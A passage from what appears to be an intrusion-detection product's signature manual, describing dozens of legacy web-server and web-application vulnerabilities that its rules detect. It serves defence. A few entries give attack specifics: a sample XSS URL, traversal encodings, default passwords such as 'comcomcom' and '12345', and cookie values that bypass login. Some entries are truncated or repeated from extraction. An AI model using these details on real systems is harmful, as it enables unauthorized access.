their configuration and assorted run-time settings.
Signature ID: 561
Apache /server-status Information Disclosure Vulnerability
Nessus: 10677
Windows operating systems. Server-status is a built-in Apache HTTP Server handler used to retrieve the server's status
report. This rule will triggers when an attacker could send a specially-crafted URL request to the '/server-status' CGI. A
successful exploitation of this will allow an attacker to obtain sensitive information.
80
Signature ID: 562
Red Hat Linux Apache Remote Username Enumeration Vulnerability
Windows operating systems. This rule will triggers when a request is made for a user's default home page, one of three
messages is displayed depending on whether the specified user name exists and has a home page configured or not
configured, or the user name does not exist on the system. An attacker can use this vulnerability to determine valid
usernames on the system. The affected versions are Apache HTTP server and RedHat Linux 7.0. No remedy available
as of September, 2008. This rule detects, when the use name is 'root'.
Signature ID: 563
Red Hat Linux Apache Remote Username Enumeration Vulnerability(1)
Windows operating systems. This rule will triggers when a request is made for a user's default home page, one of three
messages is displayed depending on whether the specified user name exists and has a home page configured or not
configured, or the user name does not exist on the system. An attacker can use this vulnerability to determine valid
usernames on the system. The affected versions are Apache HTTP server and RedHat Linux 7.0. No remedy available
as of September, 2008. This Signature detectes when the username will be 'ann_foo_fighter'.
Signature ID: 564
Cisco Catalyst Web Execution vulnerability
Signature Description: The Cisco Catalyst 3500 Series XL is a scalable line of stackable 10/100 and Gigabit Ethernet
switches. The web configuration interface for Catalyst 3500 XL switches allows remote attackers to execute arbitrary
commands without authentication when the enable password is not set, via a URL containing '/exec/' as in
/exec/show/config/cr. An attacker may use this flaw to cut your network access to the Internet, and may even lock you
out of the router.
Signature ID: 566
Tektronix PhaserLink Webserver Vulnerability
Signature Description: Tektronix phaserLink printer ship with a web server designed to help facilitate configuration of
the device. It can also completely modify the system characteristics, restart the machine, asign services etc. This rule
triggered when an attacker can calling undocumented URLs such as ncl_items.html. The ncl_items.html exits on the
remote system. This file will allow an attacker to reconfigure Tektronix printer. An attacker can use this vulnerability to
gain administrator access. The affected version of Tektronix PhaseLink Printer is 840.0 and earlier.
Signature ID: 567
Cabletron Web View Administrative Access vulnerability
Nessus: 10962
Signature Description: Cabletron webview network management tool allows network managers to access a wide range
of functions from a point-and-click world wide web interface. This web software provides a graphical, real-time
81
representation of the front panel on the switch. It can allow users to interactively configure the switch, monitor its
status, and view statistical information. An attacker can use this vulnerability to gain information.
Signature ID: 568
AirConnect Default Password vulnerability
Signature Description: AirConnect was created as a test bed for aspiring web designers and new companies that cannot
yet afford to finance their own hosting. AirConnect wireless access point installs with a default password. The
comcomcom account has a password of comcomcom which is publicly known and documented. This allows attackers
to gain full control over the wireless network settings.
Signature ID: 569
HTTP dangerous PUT method vulnerability
Signature Description: PUT is an HTTP(HTTP(Hypertext Transfer Protocol) is a communication protocol for the
transfer of information on the Internet) method. This method allows a client to upload new files on the web server. An
attacker can exploit this vulnerability to upload arbitrary web pages on the server and execute arbitrary code with the
privileges of the web server.
Signature ID: 570
IIS SHTML Cross Site vulnerability
Nessus: 10624
Signature Description: IIS server vulnerability is caused when the server parses files with SHTML extension. Using
specially designed URLs, IIS 5.0 may return user specified content to the browser. This poses great security risk,
especially if the browser is JavaScript enabled and the problem is greater in IE. The following
URL: http://iis5server/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml executes in
the browser javascript provided by "iis5server" but defined by a (malicous) user. 
Signature ID: 572
Lotus Domino information disclosure vulnerability
Nessus: 10057
Signature Description: Lotus Domino is an IBM server product that provides enterprise-grade e-mail, collaboration
capabilities, and custom application platform. Lotus Domino 5.0 to 5.0.8(inclusive) contains a flaw that may lead to an
unauthorized information disclosure. The issue is triggered when a user attempts to browse a directory, which will
disclose the names and locations of the Notes databases resulting in a loss of confidentiality.It is possible to browse the
remote web server directories by appending ?open at the end of the URL.
Signature ID: 574
BEA Systems WebLogic Server Directory Traversal %5c Vulnerability
Signature Description: BEA System WebLogic Server is an enterprise level web and wireless application server. It
provides easily surfaced diagnostics information, a GUI administration console, and command-line scripting. BEA
WebLogic Server(BEA WebLogic Server version 6.0) could allow an attacker to browse directories on the Web server.
An attacker can request a URL followed by a specific ASCII representation, such as "%5c". This vulnerability could
82
allow a user to gain access to various files and reveal sensitive data. Upgrade the latest version of WebLogic, available
at vendor's website.
Signature ID: 575
BEA Systems WebLogic Server Directory Traversal %2f Vulnerability
An attacker can request a URL followed by a specific ASCII representation, such as "%2f". This vulnerability could
Signature ID: 576
BEA Systems WebLogic Server Directory Traversal %2e Vulnerability
An attacker can request a URL followed by a specific ASCII representation, such as "%2e". This vulnerability could
Signature ID: 577
BEA Systems WebLogic Server Directory Traversal %00 Vulnerability
An attacker can request a URL followed by a specific ASCII representation, such as "%00". This vulnerability could
Signature ID: 578
IPlanet CMS/Netscape Directory Server Directory Traversal Vulnerability
Signature Description: IPlanet was a product brand that was used jointly by Sun Microsystems and Netscape
Communication when delivering software and service. Netscape is a suite of software components for sharing,
accessing, and communicating information via intranets and the internet. Netscape include components for browsing,
email, authoring HTML pages, and reading newsgroups. Netscape(iplanet) Certificate Management System(Netscape
Directory Server version 4.12.0 and iPlanet CMS version 4.2.0) could allow a remote attacker to traverse directories on
the server. An attacker can request a specially-crafted URL containing "dot dot"(\../) sequences in front on the file
name, which would allow the attacker to read or download any known file outside the Web root. No remedy available
for Netscape Directory server. Upgrade the latest version of iPlanet Certificate Management System(4.2 SP1 or later),
available at vendor's website.
83
Signature ID: 579
Arbitrary file read attempt from NTMail web interfaceFileRead
Signature Description: Gordano's NTMail is a Windows NT mail server program. One of its features is allowing
administrators to configure the server and users to read their email with a web browser via a built-in web server.
Gordano NTMail 4.2 is vulnerable to access sensitive information. A successful exploitation of this vulnerability
allows an attacker to access sensitive information on the vulnerable system. This issue is fixed in Gordano NTMail 4.3.
Administrators are advised to update Gordano NTMail 4.3 version or later version to resolve this vulnerability.
Signature ID: 581
MS-DOS Device Names Denial of Service Vulnerability
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule tries to detect DOS Device Name (DDN) DoS vulnerability for DOS Based Operating
Systems like MSDOS, Windows 95, 98. DOS device names (DDNs) are reserved names for common input and output
devices. For example, AUX (First connected serial port), CON (Keyboard and screen), etc., These DOS-devices can be
accessed through web server and if this is done, a process will be opened to handle the execution of particular device
driver. The vulnerability is that this processing did not finish and if some more requests have been made, the server will
no longer answer requests to port 80 resulting in a denial of service.This signature detects access to first connected
serial port.
Signature ID: 582
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
devices. For example, AUX (First connected serial port), CON (Keyboard and screen), etc., These DOS-devices can be
accessed through web server and if this is done, a process will be opened to handle the execution of particular device
driver. The vulnerability is that this processing did not finish and if some more requests have been made, the server will
no longer answer requests to port 80 resulting in a denial of service. This signature detects access to Keyboard and
screen.
Signature ID: 583
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
devices. For example, AUX (First connected serial port), PRN (First connected parallel port), etc., These DOS-devices
can be accessed through web server and if this is done, a process will be opened to handle the execution of particular
device driver. The vulnerability is that this processing did not finish and if some more requests have been made, the
84
server will no longer answer requests to port 80 resulting in a denial of service. This signature detects access to first
connected parallel port.
Signature ID: 584
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
devices. For example, AUX (First connected serial port), CON (Keyboard and screen), CLOCK$ etc., These DOSdevices can be accessed through web server and if this is done, a process will be opened to handle the execution of
particular device driver. The vulnerability is that this processing did not finish and if some more requests have been
made, the server will no longer answer requests to port 80 resulting in a denial of service. This signature detects access
to CLOCK$ device name.
Signature ID: 585
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
devices. For example, AUX (First connected serial port), COM1 (Serial port) etc., These DOS-devices can be accessed
through web server and if this is done, a process will be opened to handle the execution of particular device driver. The
vulnerability is that this processing did not finish and if some more requests have been made, the server will no longer
answer requests to port 80 resulting in a denial of service. This signature detects access to Serial port 1.
Signature ID: 586
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
devices. For example, AUX (First connected serial port), COM2 (Serial port) etc., These DOS-devices can be accessed
answer requests to port 80 resulting in a denial of service. This signature detects access to Serial port 2.
Signature ID: 587
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
85
devices. For example, AUX (First connected serial port), LPT1 (Parallel port) etc., These DOS-devices can be accessed
answer requests to port 80 resulting in a denial of service. This signature detects access to Parallel port 1.
Signature ID: 588
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
devices. For example, AUX (First connected serial port), LPT2 (Parallel port) etc., These DOS-devices can be accessed
answer requests to port 80 resulting in a denial of service. This signature detects access to Parallel port 2.
Signature ID: 591
PHP-Nuke sql_debug Information Disclosure vulnerability
on PHP and MySQL. The system is fully controlled using a web-based user interface. It is one of the most popular tool
for crating game clan websites. PHP-Nuke(PHP-Nuke versions 5.4 and earlier) could allow a remote attacker to view
internal SQL queries, caused by a vulnerability in the debugging feature in the sql_layer.php script. The sql_layer.php
script contains a debugging feature(sql_debug) which allows users to display information about all SQL queries. An
attacker can use this vulnerability to disclose sensitive information about the database.
Signature ID: 592
SHOUTcast Server buffer overflow vulnerability
Signature Description: SHOUTcast consists of a client-server model, with each component communicating via a
network protocol that intermingles audio data with metadata such as song titles and the station name. SHOUTcast
Server 1.8.2 is vulnerable to stack based buffer overflow via several http requests with a long. A successful exploitation
of this vulnerability allows an attacker to execute arbitrary commands on the vulnerable system. No remedy available
as of September 13, 2008.
Signature ID: 593
Pocsag default 'password' login
Signature Description: POC32 is a program designed to decode POCSAG pager messages captured via scanning the
pager frequencies. These encoded messages are then transferred to the computer via audible signal, and decoded and
displayed by the POC32 software. POC32 2.0 5 is vulnerable to a default password access. This vulnerability is due to
POCSAG POC32 program does not properly prevent remote users from accessing its server port, even if the option has
been disabled. A successful exploitation of this vulnerability allows an attacker to access sensitive information on the
86
vulnerable system. This issue is fixed in POC32 2.0 7 version. Administrators are advised to update POC32 2.0
7version or later version to resolve this issue.
Signature ID: 594
VisualRoute Web Server Detection
Nessus: 10744
Signature Description: VisualRoute is a web based solution. VisualRoute Server provides a graphical traceroute and
ping test from this server to any other network device. This server allows attackers to perform traceroute to third party's
hosts without revealing themself to the target they are tracerouting. This rule generates an event when an attacker try to
know the VisualRoute service is runing or not.
Signature ID: 595
Xerver web server DOS
Signature Description: Xerver is a freely available webserver. It will run on any operating system with Java installed,
including Microsoft Windows, Unix/Linux variants, MacOS. Xerver Xerver 2.10 is vulnerable to denial of service via
http request contains many "C:/" sequences. This vulnerability is fixed in Xerver Xerver 2.20. Administrators are
advised to update the Xerver Xerver 2.20 or later version to resolve this vulnerability.
Signature ID: 600
Neoteris Instant Virtual Extranet Cross Site Scripting Session Hijacking Vulnerability
Signature Description: Neoteris Instant Virtual Extranet(IVE) is an application-based remote access solution that is
accessed via a standard web browser. Instant Virtual Extranet, version 3.01 and prior, is a cross-site scripting
vulnerability, caused by improper validation of user-supplied input. This issue triggered when an attacker is made to
access srsrv.cgi script on a web server. The successful exploitation of this allow an attacker to hijack the victim's
session. This issue is fixed in the version of IVE 3.1 or later. The administrator advice to update the latest version of
IVE 3.1 or later, which available at vendor's web site.
Signature ID: 601
WEB-CGI ikonboard.cgi access vulnerability
Signature Description: IKonBoard is a Web Bulletin Board Service(Bulletin Board System(BBS) is a computer system
running software that allows users to connect and login to the system using a terminal program. It may be accessible
from a dial-up modem, Telnet, or the Internet) software package written in Perl. IKonBoard(Ikonboard version 3.1.1) is
prone to an arbitrary command execution vulnerability. An attacker can bypass user input validation by inserting illegal
characters into the "lang" value of a user cookie, which could allow the attacker to execute arbitrary code on the
vulnerable system. No remedy available as of September, 2008.
Signature ID: 602
WEB-CGI chipcfg.cgi access vulnerability
Signature Description: The Beck IPC@CHIP is a single chip embedded webserver. The Beck IPC@CHIP ships with a
cgi script named "ChipCfg". IPC@CHIP could allow a remote attacker to obtain sensitive network information. By
87
default, the chipcfg.cgi script is installed. A remote attacker can send a specially-crafted URL request containing the
chipcfg.cgi script to the server to gain access to sensitive network information. No remedy available as of July,
2008. 
Signature ID: 603
WEB-CGI album.pl access vulnerability
Signature Description: The MIke Bobbit Album is a Perl CGI script used for managing pictures on a webserver. It
allows you to browse a directory tree and display all the images in it through a customizable web based interface. Any
new images added are automatically displayed in the Photo album. album.pl(Mike Bobbitt album.pl version 6.1 and
prior) is command executeion vulnerability. The vulnerability reportedly exists when alternate configuration files are
used, an attacker can use this vulnerability to execute arbitrary commands on the server and to gain local, interactive
access to the underlying host.
Signature ID: 604
WEB-CGI streaming server parse_xml.cgi access vulnerability
Signature Description: Apple Darwin and Quick Time Streaming Administration Servers are web based services that
allow administrators to manage the Darwin and Quick Time Streaming Servers. Apple's QuickTime Streaming Server
and Darwin's Streaming Server, version 4.1.1 and 4.1.2, could allow a remote attacker to execute arbitrary commands
on the server. The issue triggered when an attacker sends a specially-crafted HTTP GET request to the parse_xml.cgi
with a CGI parameter value containing a pipe(|) character, an attacker can use this vulnerability to execute arbitrary
commands on the system. No remedy available for this issue.
Signature ID: 606
BugZilla Post_Bug.CGI Bug Report Spoofing Vulnerability
Industry ID: CVE-2002-0008 Bugtraq: 3794,3793
Signature Description: Bugzilla is a bug or issue-tracking system. Bug-tracking systems allow individual or groups of
developers effectively to keep track of outstanding problems with their product. Bugzilla, version before 2.14.1, could
allow a remote attacker to post a bug as another user. The issue triggered, an attacker can saves the enter_bug.cgi form
locally and edits the userid, the attacker can post a bug as another user by modifying the reporter parameter
enter_bug.cgi, which is passed to post_bug.cgi. The issue is fixed in the version of Bugzilla 2.14.1 or later. Update this
version for removing the issue, which is available at vendor's web site.
Signature ID: 607
BugZilla Process_Bug.CGI Comment Spoofing Vulnerability
developers effectively to keep track of outstanding problems with their product. Bugzilla, version before 2.14.1, allow
non-authorized users to post comments as any user of their choosing, including non-valid usernames. The
process_bug.cgi script only checks that a user exists when a bug comment is added, not that the user adding the bug is
the one currently logged in. This may be exploited by saving the add comment form locally and then changing the
value of the appropriate form element. The attacker then submits the altered form. The issue is fixed in the version of
Bugzilla 2.14.1 or later. Update this version for removing the issue, which is available at vendor's web site.
88
Signature ID: 608
Cobalt RaQ4 Administrative Interface Command Execution Vulnerability
Signature Description: The Cobalt RaQ 4 is a server appliance that provide a dedicated Web-hosting platform and
offers new capabilities for high-traffic, complex Web sites and e-commerce applications. The Cobalt RaQ 4 server
appliance with the Security Hardening Package(SHP) could allow a remote or local attacker to execute arbitrary
commands on the system, caused by improper validation of the email variable by the overflow.cgi script. The issue
triggered when an attacker could send arbitrary commands to the email variable using a POST request to the
overflow.cgi script, an attacker can use this vulnerability to execute arbitrary commands on the system.
Signature ID: 609
WEB-CGI smartsearch.cgi access vulnerability
Bugtraq: 7133
Signature Description: Smart Search is a CGI search engine. This is a feature of our digital video recorders that allows
you to search for changes in a particular area of an image. Smart Search(Smart Search version 4.25.0) "pay-per-click"
search engine software contains a vulnerability that allows code execution using a specially-crafted URL. Using the
"keywords" parameter accepted by smartsearch.cgi, an attacker can pass arbitrary Perl code to the web server, which
will then attempt to execute it.
Signature ID: 610
Access to Moreover.com CGI File cached_feed.cgi vulnerability
Signature Description: The cached_feed CGI supplied by Moreover.com is used to retrieve new headlines from the
Moreover.com site, and then store them for retrieval and display within your own local web site. Cached_feed,
Moreover.com, cached_feed version 1.0, is a directory traversal vulnerability in Moreover.com. The issue is triggered
when an attacker submitting a specially-crafted URL containing "dot dot"(/../) sequences to the cached_feed CGI script,
an attacker can use this vulnerability to read files and directories on the web server. The issue is fixed in the version
cached_feed 2.0 or later. Update this version for removing this issue, which available at vendor's web site.
Signature ID: 611
Snitz Forums 2000 Register.ASP SQL Injection Vulnerability
Signature Description: Snitz Forums is an Active Server Page (asp) application running on Microsoft Internet
Information Server. Snitz Forums(Snitz Forums 2000 version 3.3.03) is a SQL injection vulnerability, caused by
improper validation of user-supplied input by the register.asp script. A remote attacker could passing malicious SQL
commands to the register.asp script using the "Email" variable, which would allow the attacker to gain sensitive
information in the database, modify data, and execute stored procedures.
Signature ID: 612
WEB-IIS MS BizTalk server access vulnerability
Signature Description: Microsoft BizTalk Server is a Microsoft product business-process automation and application
integration both within and between businesses. Microsoft BizTalk Server 2002 is a buffer overflow vulnerability,
caused by improper bounds checking in the HTTP Receiver component. The HTTP Receiver component is used as an
89
ISAPI extension for receiving HTTP documents. The issue triggered when the HTTP Receiver has been enable, a
remote attacker could send a biztalkhttpreceive.dll via long string(more than 250 characters) to the HTTP Receiver, an
attacker can use this vulnerability to overflow a buffer and execute arbitrary code on the server or crash the IIS server.
The issue is fixed in the appropriate patch, Microsoft Security Bulletin MS03-016, which is available at vendor's web
site.
Signature ID: 613
"WEB-IIS Synchrologic Email Accelerator userid list access vulnerability
Nessus: 11657
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This event indicates
that an attempt has been made to exploit a weakness in the Synchrologic's Email Accelerator application. Synchrologic
is a product which allows remote PDA users to synch with email, calendar, etc. This rule will triggers when an attacker
attempt to access aggregate.asp page. The successful exploitation of this issue will allow an attacker to gain
information on the list of users allow to use the service.
Signature ID: 614
WEB-IIS IISProtect access vulnerability
Bugtraq: 7675,7661 Nessus: 11661
Signature Description: IISProtect is a third-party application that provides password authentication to directories on IIS
using a Web-based interface. An attacker can bypass authentication by requesting a specific file with an encoded URI,
and can then proceed to use SQL injection techniques to execute arbitrary code with administrative privileges.
iisProtect iisProtect 2.2,iisProtect iisProtect 2.1 are Vulnerable 
Signature ID: 615
WEB-IIS IISProtect globaladmin.asp access vulnerability
Nessus: 11661
Signature Description: IISProtect will protect all web site files including images, databases, html, ASP and Protect
directories, users accounts, complete web administration. It provides Authentication, User Management, and
Membership Systems. This rule will triggered when an attacker send a specially-crafted URL request to the
globaladmin.asp page, an attacker can use this vulnerability to gain administrator access to the web server running
IISProtect without the need to authentication.
Signature ID: 616
WEB-IIS IISProtect siteadmin.asp access vulnerability
Signature Description: IISProtect is a security product for Microsoft Windows that provides authentication based
access control to protect web resources. It is easy to use and requires no programming, Scripting or Web development
experience. iisPROTECT(iisPROTECT version 2.2-r4) is a SQL injection vulnerability, caused by improper filtering of
various variables. A remote attacker could send a specially-crafted URL request to the SiteAdmin.asp script containing
arbitrary SQL code in a 'GroupName' variable, an attacker could use this vulnerability to add, modify, or delete
information in the backend database. No remedy available as of July, 2008.
90
Signature ID: 617
Microsoft Windows Media Services NSIISlog.DLL Remote Buffer Overflow Vulnerability
Signature Description: Microsoft Windows Media Services, a feature of the Microsoft Windows 2000 server, is
designed to deliver media content to clients across a network via multicast media streaming. This service is not
installed by default. A stack-based buffer overflow exists in the ISAPI (Internet Services Application Programming
Interface) nsiislog.dll extension of the Internet Information Services (IIS). If the server is configured for Windows
Media Services, a remote attacker could send an overly large POST request to the server to overflow a buffer and cause
IIS to stop responding to legitimate Web requests and execute arbitrary code on the system. Microsodt has addressed
updates for this vulnerability in MS03-022.
Signature ID: 618
WEB-IIS Battleaxe Forum login.asp vulnerability
Signature Description: The BTTLXE Forum is a web application used for web-based discussion forums.
BttlxeForum(bttlxeForum version 2.0 beta 3 and earlier) is a SQL injection vulnerability, caused by improper
validation of user-supplied input that is used to construct SQL queries. This data may be supplied via the 'password'
field without a user name in the login.asp page. A remote attacker can use this vulnerability to inject malicious data into
SQL queries and gain unauthorized access to the system.
Signature ID: 621
WEB-MISC mod_gzip_status vulnerability
Nessus: 11685
Signature Description: This event indicates that an attempt has been made to ascertain the status of the Apache module
mod_gzip on a host from a source external to the protected network. mod_gzip is used to compress data sent by an
Apache webserver in an attempt to preserve bandwidth and speed up communications between client and server. The
attacker may be trying to gain information on the server by making a query to the mod_gzip_status page. This could
lead to information disclosure which might then be used in further attacks against that host.
Signature ID: 623
WEB-MISC logicworks.ini access Vulnerability
Signature Description: Web-ERP is a complete web based accounting/ERP system that requires only a web-browser
and pdf to use. WEB-ERP(WEB-ERP versions 0.1.4 and prior) could allow a remote attacker to gain access to the
logicwork.ini configuration file. A remote attacker could send a URL request for the logicworks.ini file to obtain
sensitive information, including the username and password for the backend MySQL database. Upgrade the latest
version of WEB-ERP, available at vendor's web site.
Signature ID: 624
Philboard philboard_admin.ASP Authentication Bypass Vulnerability
Signature Description: Phiboard is freeware forum application implemented in ASP Scripts. Philboard, version 1.14
and prior, could allow a remote attacker to gain unauthorized administrative access to the forum. Philboard stores
authentication settings in cookies called "philboard_admin" and "admin". The issue triggered when an attacker can
91
send a specially-crafted HTTP GET request containing the name of the cookie(such as philboard_admin=True and
admin=True), an attacker can use this vulnerability to gain administrative access to the forum, including the backend
database. No remedy available as September, 2008.
Signature ID: 625
WEB-MISC philboard_admin.asp authentication bypass vulnerability
Signature Description: Philboard is a web-based forum implemented using ASP script. Philboard(Philboard version
1.14 and prior) could allow a remote attacker to gain unauthorized administrative access to the forum. This event
indicates that an attempt has been made to exploit a weakness in the Philboard ASP application. By setting a cookie
value to "True" administration rights are granted to that user. The user would then gain control of the application and
have access to all administration functions. This rule generates an event if the attacker makes a request for the
administration page with the cookie "philboard_Admin" value set to true from a source external to the protected
network. No remedy available as of September, 2008.
Signature ID: 626
WEB-MISC philboard.mdb Vulnerability
Nessus: 11682
Signature Description: Phiboard is freeware forum application implemented in ASP Scripts. Philboard, version 1.14
and prior, could allow a remote attacker to gain unauthorized administrative access to the forum. By default, Philboard
installs the Access database file to database/philboard.mdb on the web server. Without authentication, an attacker can
download this file to access Philboard bulletin board user names, passwords, and message archives. No remedy
available as of September, 2008.
Signature ID: 627
WEB-MISC globals.pl access Vulnerability
developers effectively to keep track of outstanding problems with their product. Bugzilla(Bugzilla versions 2.23.3
through 3.0.0) ships with a file called 'globals.pl', containing global variables and other information used by various
Bugzilla components. Among the more sensitive variables stored in this file are the database user name and password.
This file is possible to read by a user via a web browser and also obtain sensitive information, caused by insecure
permissions on time-tracking fields in the WebService(XML-RPC)interface.
Signature ID: 628
WEB-MISC lyris.pl access Vulnerability
Signature Description: Lyris ListManager is the world's most popular software for creating, sending, and tracking
highly effective email campaigns, newsletters, and discussion groups. This rule triggered when an attacker could send a
specially-crafted URL request to the lyris.pl script using the variable list_admin. The variable list_admin is used to
identify the user as an administrator, by changing this value from F to T the attacker can identify himself as the mailing
list administrator. An attacker can use this vulnerability to gain sensitive information and obtain administrator access.
The affected version of Lyris ListManager is 3.0.0. and 4.0.0.
92
Signature ID: 630
Alibaba CGI post32.exe arbitrary command execution Vulnerability
Bugtraq: 1485
Signature Description: Alibaba is a web server that runs on Windows platforms. This rule triggered when an attacker
can send specially-crafted URL request to the post32.exe with the piped commands. The successful exploitation allow
an attacker to execute arbitrary commands on the web server. The Affected version of Alibaba is 2.0.0.
Signature ID: 631
WEB-MISC chip.ini access Vulnerability
Signature Description: The Beck IPC@CHIP is a single chip embedded webserver. The Web Server's root directory is
set to / by default. This could allow a remote attacker can download arbitrary files from any location on the system,
including the chip.ini file, this file contains all of the login names and associated passwords for the device. No remedy
Signature ID: 633
Lotus Domino Dot File Disclosure Vulnerability
Signature Description: Lotus Domino is a multi-platform application server developed by IBM. Lotus Domino
provides the complete infrastructure needed to create, test, deploy, and manage distributed, multi-lingual applications,
including directory, database, Web-server, email server and so on, all in one application. Lotus Domino(Lotus Domino
version 5.0 and 6.0) could allow a remote attacker to obtain sensitive information. A remote attacker could send a
specially-crafted URL request appending with a "dot" character. This could allow the attacker to view source code and
disclose sensitive information, such as database credentials, embedded in server side scripts or include files. No remedy
Signature ID: 634
WEB-MISC Lotus Notes .pl script source download Vulnerability
specially-crafted URL request for any non-default Lotus file types(like Perl scripts(".pl")) appended with a "dot"
character. This could allow the attacker to view source code and disclose sensitive information, such as database
credentials, embedded in server side scripts or include files. No remedy available as of September, 2008.
Signature ID: 635
WEB-MISC Lotus Notes .csp script source download Vunerability
93
specially-crafted URL request for any non-default Lotus file types(like Crystal Server pages(".csp")) appended with a
"dot" character. This could allow the attacker to view source code and disclose sensitive information, such as database
credentials, embedded in server side scripts or include files. No remedy available as of September, 2008.
Signature ID: 637
WEB-MISC iPlanet .perf access Vulnerability
Nessus: 11220
Signature Description: IPlanet is Sun Microsystem's solution for a Web server and related programs intended to allow
an enterprise to take advantage of the Internet. It uses the file '.perf' to display performance statistics for the server. This
rule triggered when an attacker can send a request for the file '.perf'. The successful exploitation allow an attacker can
access the statistics for the server.
Signature ID: 638
Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
Signature Description: Apache Tomcat is the servlet container that is used in the official Reference implementation for
the Java Servlet and JavaServer Pages technologies. Apache Tomcat, version before 3.3.1a, could allow a remote
attacker to obtain sensitive information. The issue was triggered when a remote attacker sends a HTTP request
containing null(%00) or backslash(\) characters, an attacker can use this exploitation to disclose sensitive information
and also execute malicious java code on the web server. The issue is fixed in the version of Tomcat 3.3.1a or later.
Update this version for removing the issue, which is available at vendor's web site.
Signature ID: 639
WEB-MISC DB4Web access Vulnerability
Nessus: 11180
Signature Description: DB4Web is an application server used to access various sources of data via a web interface.
DB4Web does not handle the characters ": and "\" correctly when they are URL encoded. An attacker can use this flaw
to gain access to sensitive system information. Also the application does not correctly handle the use of extra "/" in a
URI. It is also possible for the attacker to open arbitrary TCP connections using DB4Web and may be able to use it for
portscanning other hosts.
Signature ID: 640
MondoSearch Source Disclosure Vulnerability
Signature Description: MondoSearch is an advance, multilingual enterprise search engine. It helps users quickly find
relevant data across the enterprise. MondoSearch fails to sufficiently validate user supplied requests for .cgi files.
MondoSearch, version 4.4, could allow a remote attacker to obtain script source code. The issue triggered when an
attacker could send a specially-crafted string to the 'MsmMask.exe' using 'mask' parameter, an attacker can use this
vulnerability to view the source code of arbitrary files. No remedy available as of July, 2008.
Signature ID: 642
WEB-MISC helpout.exe access Vulnerability
Signature Description: IBM Web Traffic Express (WTE) is a Web caching proxy server that is included as a
94
component in the WebSphere Edge Server. WebSphere refers to a brand of IBM software products. It is designed to set
up, operate, and integrate e-business applications across multiple computing platforms using java-based Web
technologies. IBM Web Traffic Express(IBM WebSphere Caching Proxy Server versions 3.6 and 4.0) is a denial of
service vulnerability. A remote attacker could send a malformed HTTP request to the /cgi-bin/helpout.exe script, the
attacker would cause the proxy server(ibmproxy.exe) to crash. Upgrade the latest version(4.0.1.26 or later), available at
vendor's website.
Signature ID: 643
WebLogic Server and Express HTTP TRACE Credential Theft Vulnerability
Industry ID: CVE-2004-2320 Bugtraq: 9506,9561,11604 Nessus: 11213
Signature Description: The TRACE method is used when debugging a webserver to ensure that server returns
information to the client correctly. When used with other vulnerabilities it is possible to use the TRACE method to
return sensitive information from a webserver such as authentication data and cookies. This is known as a Cross Site
Tracing (XST) attack. The Affected versions are BEA WebLogic Server and Express 8.1 SP2 and earlier, 7.0 SP4 and
earlier, 6.1 through SP6, and 5.1 through SP13.
Signature ID: 644
TtForum remote command execution Vulnerability
Signature Description: TtForum is web based forum implemented in PHP. ttForum/ttCMS(ttCMS 2.2) could allow a
remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the
index.php script using the $template variable that specified a malicious PHP file on a remote system as a parameter, an
attacker can use this vulnerability to execute arbitrary code on the vulnerable system. No remedy available as of
September, 2008.
Signature ID: 645
PHP-Proxima autohtml.php access Vulnerability
Signature Description: PHP-Proxima is a website portal system. It is implemented in PHP. PHP-Proxima(PHPProxima version 6.0) could allow a remote attacker view known files on the system. By sending a specially-crafted
URL request to the autohtml.php that specifies a known file on the system for the '$name' variable, which would allow
the attacker to access the contents of the targeted file to obtain sensitive information. No remedy available as of
September, 2008.
Signature ID: 647
OmniHTTPd test.php sample cross-site scripting Vulnerability
Signature Description: OmniHTTPD is a powerful all-purpose industry compliant web server built specially for the
Windows. OmniHTTPD(OmniHTTPd version below 2.4) is a cross-site scripting vulnerability. A remote attacker
could create a specially-crafted URL request containing test.php script embedded using hexadecimal URL encoded
characters to one of the sample page, once the link is clicked. An attacker can use this vulnerability to steal cookies or
perform other web-based attacks. No remedy available as of September, 2008.
95
Signature ID: 649
TtCMS Header.PHP Remote File Include Vulnerability
Signature Description: TtCMS is a PHP-based content management system that fully supports MySQL. ttCMS(ttCMS
version 2.3 and prior) could allow a remote attacker to include malicious PHP files. A remote attacker could send a
specially-crafted URL request to the header.php script using the ?admin_root variable that specifies a malicious PHP
file on a remote system as a parameter, an attacker can use this vulnerability to execute arbitrary code on the vulnerable
system. No remedy available as of September, 2008.
Signature ID: 650
Turba status.php access vulnerability
Signature Description: This event indicates that an attempt has been made to exploit potential weaknesses in php
applications. The Turba of Horde(Horde version 2.1) PHP application allows a user to request the status.php file which
may disclose valuable information about the host and the application. The attacker may be trying to gain information
on the php implementation on the host, this may be the prelude to an attack against that host using that information. No
remedy available as of September, 2008.
Signature ID: 651
BLNews objects.inc.php4 PHP file include Vulnerability
Signature Description: BLNews is a web-based news application written in PHP. BLNews(BLNews version 2.1.3)
could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL
request to the objects.inc.php4 script using the $server variable that specifies the tools.inc.php4 or cmd.php4 script
from a remote system as a parameter, an attacker can exploit this vulnerability to upload a malicious PHP files and
execute arbitrary PHP code with the privileges of the web server. No remedy available as of September, 2008.
Signature ID: 653
WEB-PHP TextPortal admin.php default password (12345)
Signature Description: TextPortal is a text-based PHP portal system with forum, voting, user registration, etc.
TextPortal(TextPortal version 0.8 and prior) could allow a remote attacker to gain unauthorized access. TextPortal
encrypts passwords using crypt and stores them in the 'db_ures\admin_pass.php' file. Specifically, TextPortal uses
'12345' as the default password for the 'god2' user account. If the Administrator fails to change the default password of
the "god2" account, a remote attacker could send a specially-crafted URL to the admin.php script to gain unauthorized
access to TextPortal. No remedy available as of September, 2008. This rule triggers when the default password is
'12345'.
Signature ID: 654
